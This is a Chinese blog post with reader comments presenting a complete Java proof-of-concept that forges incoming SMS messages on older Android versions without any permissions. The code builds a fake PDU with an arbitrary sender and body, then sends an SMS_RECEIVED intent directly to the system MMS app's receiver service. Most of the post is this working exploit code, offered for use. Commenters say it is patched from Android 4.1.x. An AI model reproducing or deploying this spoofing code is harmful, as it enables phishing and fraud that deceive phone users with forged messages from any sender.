`

android 无权限 伪造短信

 
阅读更多

0x01 这个有是大名鼎鼎的蒋教授发现的,原理简单,有点意思

 

0x02 代码实现

package com.smstrick;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.util.Calendar;
import java.util.GregorianCalendar;

import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.PhoneNumberUtils;
import android.util.Log;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.EditText;

public class SMSTrickActivity extends Activity implements OnClickListener{
    /** Called when the activity is first created. */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);

        View continue_button = this.findViewById(R.id.button1);

        continue_button.setOnClickListener((OnClickListener) this);
    }
    public void onClick(View v) {
    	EditText eNum;
    	EditText eMsg;
    	String sNum;
    	String sMsg;
    	
    	eNum   = (EditText)findViewById(R.id.editText1);
    	eMsg   = (EditText)findViewById(R.id.editText2);
    	
    	sNum = eNum.getText().toString();
    	sMsg = eMsg.getText().toString();
    	

    	
    	//sNum cannot be blank
    	if(sNum.equals("")) sNum = "123456";
    	
    	createFakeSms(this.getApplicationContext(),sNum,sMsg);
    	
    }
    
    private static void createFakeSms(Context context, String sender, String body) {
    //Source: http://stackoverflow.com/a/12338541
    //Source: http://blog.dev001.net/post/14085892020/android-generate-incoming-sms-from-within-your-app
        byte[] pdu = null;
        byte[] scBytes = PhoneNumberUtils
                .networkPortionToCalledPartyBCD("0000000000");
        byte[] senderBytes = PhoneNumberUtils
                .networkPortionToCalledPartyBCD(sender);
        int lsmcs = scBytes.length;
        byte[] dateBytes = new byte[7];
        Calendar calendar = new GregorianCalendar();
        dateBytes[0] = reverseByte((byte) (calendar.get(Calendar.YEAR)));
        dateBytes[1] = reverseByte((byte) (calendar.get(Calendar.MONTH) + 1));
        dateBytes[2] = reverseByte((byte) (calendar.get(Calendar.DAY_OF_MONTH)));
        dateBytes[3] = reverseByte((byte) (calendar.get(Calendar.HOUR_OF_DAY)));
        dateBytes[4] = reverseByte((byte) (calendar.get(Calendar.MINUTE)));
        dateBytes[5] = reverseByte((byte) (calendar.get(Calendar.SECOND)));
        dateBytes[6] = reverseByte((byte) ((calendar.get(Calendar.ZONE_OFFSET) + calendar
                .get(Calendar.DST_OFFSET)) / (60 * 1000 * 15)));
        try {
        	Log.d("ice", "test one");
            ByteArrayOutputStream bo = new ByteArrayOutputStream();
            bo.write(lsmcs);
            bo.write(scBytes);
            bo.write(0x04);
            bo.write((byte) sender.length());
            bo.write(senderBytes);
            bo.write(0x00);
            bo.write(0x00); // encoding: 0 for default 7bit
            bo.write(dateBytes);
            try {
            	
                String sReflectedClassName = "com.android.internal.telephony.GsmAlphabet";
                Class cReflectedNFCExtras = Class.forName(sReflectedClassName);
                Method stringToGsm7BitPacked = cReflectedNFCExtras.getMethod(
                        "stringToGsm7BitPacked", new Class[] { String.class });
                stringToGsm7BitPacked.setAccessible(true);
                byte[] bodybytes = (byte[]) stringToGsm7BitPacked.invoke(null,
                        body);
                bo.write(bodybytes);
            } catch (Exception e) {
            	e.printStackTrace();
            }

            pdu = bo.toByteArray();
        } catch (IOException e) {
        	e.printStackTrace();
        }

        Intent intent = new Intent();
        intent.setClassName("com.android.mms",
                "com.android.mms.transaction.SmsReceiverService");
        intent.setAction("android.provider.Telephony.SMS_RECEIVED");
        intent.putExtra("pdus", new Object[] { pdu });
        //intent.putExtra("format", "3gpp");
        context.startService(intent);
    }

    private static byte reverseByte(byte b) {
        return (byte) ((b & 0xF0) >> 4 | (b & 0x0F) << 4);
    }
}

 

0x03 实质分析 核心在于自定义了系统的

 

        Intent intent = new Intent();

        intent.setClassName("com.android.mms",

                "com.android.mms.transaction.SmsReceiverService");

        intent.setAction("android.provider.Telephony.SMS_RECEIVED");

        intent.putExtra("pdus", new Object[] { pdu });

        //intent.putExtra("format", "3gpp");

        context.startService(intent);

 

收到短信的intent,从而伪造了短信,而且不需要任何的权限。

 

 

分享到:
| A new way to hack android app info
评论
3 楼 mengfeicheng2012 2014-02-11  
貌似4.1的系统把这个漏洞堵上了
2 楼 pdsljlj 2013-11-21  
android 4.1.2 以上好像是不能用的
1 楼 qian546000 2013-09-21  
icefish大神,
为什么短信的内容如果是中文的话,就会出现异常呢?怎样修改代码,才能支持中文的短信内容呢?
发表评论

您还没有登录,请您登录后再发表评论

相关推荐

Magicbox
Global site tag (gtag.js) - Google Analytics